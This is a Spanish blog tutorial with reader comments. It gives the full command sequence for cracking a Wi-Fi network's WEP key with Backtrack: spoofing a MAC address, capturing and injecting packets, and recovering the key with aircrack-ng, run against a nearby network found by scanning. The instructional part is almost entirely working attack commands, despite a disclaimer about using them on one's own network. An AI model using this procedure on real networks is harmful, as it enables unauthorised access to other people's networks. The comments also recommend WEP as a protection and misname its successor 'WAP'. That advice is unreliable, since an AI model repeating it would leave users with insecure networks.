Comprobar Seguridad De Una Red WIFI con Backtrack
Nota: No asumimos ninguna responsabilidad por el mal uso que se le pueda dar a esta información, presentada de manera didáctica y con la intención de mejorar la seguridad de nuestros usuarios, por favor si realizas estos ejercicios hazlo en tu propia red o pide permiso para hacerlo.
Este tutorial fue realizado con una tarjeta inalámbrica Broadcom 802.11g
Primero que todo insertamos el DVD de Backtrack y reiniciamos nuestro sistema, iniciamos desde el DVD, aparece la primera pantalla con distintas opciones, elijen la opción Live CD, luego empieza a cargar los distintos archivos para que pueda funcionar backtrack y te pide nombre de usuario y password
Usuario: root Password:toor
Y para comenzar en modo grafico escriben “startx” (obviamente sin comillas)
una vez que cargue abrimos una terminal y escribimos lo siguiente:
airmon-ng stop wlan0 con esto vemos las interfaces que tenemos en la PC, en mi caso me muestra wifi0 y ath0, para ver la interface que tenemos la podemos ver en otra terminal escribiendo iwconfig
Ahora activamos la interface, en mi caso va a ser wifi0
Para activar la interface escribimos en la misma ventana airmon-ng start wifi0
Como vemos ya esta activada en modo monitor, con el comando iwconfig podemos ver cuál es la Mac.
Ahora procedemos a cambiar la dirección Mac por una falsa escribiendo lo siguiente:
macchanger -m 00:11:22:33:44:55 wifi0
Ahora empezamos a escanear las redes que tenemos en nuestro alcance, para esto usaremos el comando airodump-ng wifi0 con lo cual nos va a mostrar las señales que tenemos
Para ver cuales señales nos sirven, hay que ver la columna #/s, esa columna nos indica la cantidad de datos que la señal esta emitiendo, en este caso vamos a utilizar la primera señal que aparece en la imagen (HREYGA).
Ahora empezamos a escanear las redes que se encuentran en ese canal, en este caso canal 11 Para ello escribimos lo siguiente:
airodump-ng –channel 11 –write exploit wifi0
Channel 11 es en donde se encuentra la señal que vamos a escanear
Write exploit es el archivo que se va a crear para poder guardar los datos que se capturen
wifi0 es la interface de la tarjeta
Después de esto nos aparece lo siguiente
Lo que hacemos ahora es empezar a capturar los datos de esta señal, para lo cual escribimos en otra terminal
aireplay-ng -1 0 -b 00:1C:F0:3A:FE:4D -h 00:11:22:33:44:55 wifi0
Después de ejecutar el comando anterior backtrack empieza a capturar los paquetes necesarios, les debería aparecer una imagen parecida a esta
Cuando ya tengan suficientes ARP detienen la inyección de paquetes con control + c
Ahora para comprobar la seguridad de la red escribimos
Aircrack-ng exploit-01.cap
Nos pedirá que seleccionemos el numero de la red, en este caso será en el numero 1
Con esto obtenemos la clave wep de la red comprobando así que la seguridad es deficiente
Key found(Wep Key) 70:61:73:73:77:6F:72:64:5F:70:61:73:73
para salir de backtrack 4, vamos a logout y ejecutamos el comando poweroff, con lo cual apaga nuestro equipo.
con esto damos por concluido este tutorial.
Quizá te interese :
Para este tutoríal instalaremos postgresql-8.3 y postgresql-8.3-postgis desde el Gestor de paque ...
Internet Móvil Como es saberse en la actualidad el internet móvil es una tecnología que ha teni ...
Para aquellos que les gusta programar en Java en cualquier momento, aquí les dejo un tutorial so ...
Y que sugerencias podrías hacernos para mejorar la seguridad de nuestras redes?
[...] This post was mentioned on Twitter by Daniel Doctor. Daniel Doctor said: Comprobar Seguridad De Una Red WIFI con Backtrack http://bit.ly/dmUUzr [...]
interesante pregunta la que hace Daniel, espero con animo una gran respuesta.
Hola, respondiendo a la pregunta estas son algunas sugerencias:
-Controlar el área de emisión de mensajes y bloquear todos los puntos de acceso. Muchos puntos de acceso inalámbrico permiten ajustar la potencia de la señal. Coloca tus puntos de acceso lo más lejos posible de muros exteriores y ventanas. Prueba la potencia de la señal para que pueda comunicarse difícilmente desde estos lugares. Luego, asegúrate de cambiar la contraseña predeterminada en tu punto de acceso. Utiliza una contraseña fuerte para proteger todos los puntos de acceso.
-Especifica qué computadores podrán conectarse a la red inalámbrica a través de direcciones MAC.
-Agrega un firewall a los puntos de acceso de la red, y a cada computador de ésta y mantenlos actualizados.
-Instala un antivirus y programas anti-spyware.
-Activa la Privacidad de equivalencia alámbrica (WEP). La WEP codifica cadenas de datos inalámbricos entre las estaciones de trabajo y los servidores para evitar que los usuarios no autorizados lean el tráfico que está en tránsito. Existe otro nuevo método más efectivo llamado WAP aunque no todos los computadores lo aceptan, por lo que WEP también es muy usado.
-Usa el Identificador de conjunto de servicios (SSID) inteligentemente. Compra los puntos de acceso que permiten desactivar la emisión SSID. Esto evita que los puntos de acceso transmitan el nombre de la red y que se relacionen con computadores que no estén configuradas con tu SSID.
Hola pues tengo un problema ya una vez que obtuve la wep, y deseo salirme del back track, al apagar la computadora no inicia windows automaticamente, como que quiere iniciar el linux de nuevo. por favor espero una pronta respuesta de como iniciar windows de nuevo por favoooor
Primero revisa que hayas retirado el disco de Backtrack de tu computadora, es un LiveCD y no se instala a menos que le des la indicación.
Si tienes más dudas, puedes preguntar con libertad.
Hola, que tal, Alejandro ese problema es muy común incluso a mi me ha pasado un par de veces, como te comenta Daniel lo más seguro es que hayas olvidado retirar el CD de tu computadora, lo que tienes que hacer es retirarlo de la charola y reiniciar tu computadora o si no deseas reiniciar elije en el menú del LiveCD Arrancar desde el Disco Duro e iniciara automáticamente como de costumbre ,con el sistema operativo que tengas instalado , espero te sirva de ayuda ,cualquier duda puedes seguir preguntando.
con airdump no me indica ningun punto de acceso, soy novato y desconozco si es que tengo que activar antes la tarjeta wifi del portatil. Agradezco ayuda.
hola ,disculpa por no responder inmediatamente, la respuesta a tu pregunta es por que SI tienes que activar la tarjeta inalambrica (WIFI) de tu computadora cualquier otra duda estamos para ayudarte :)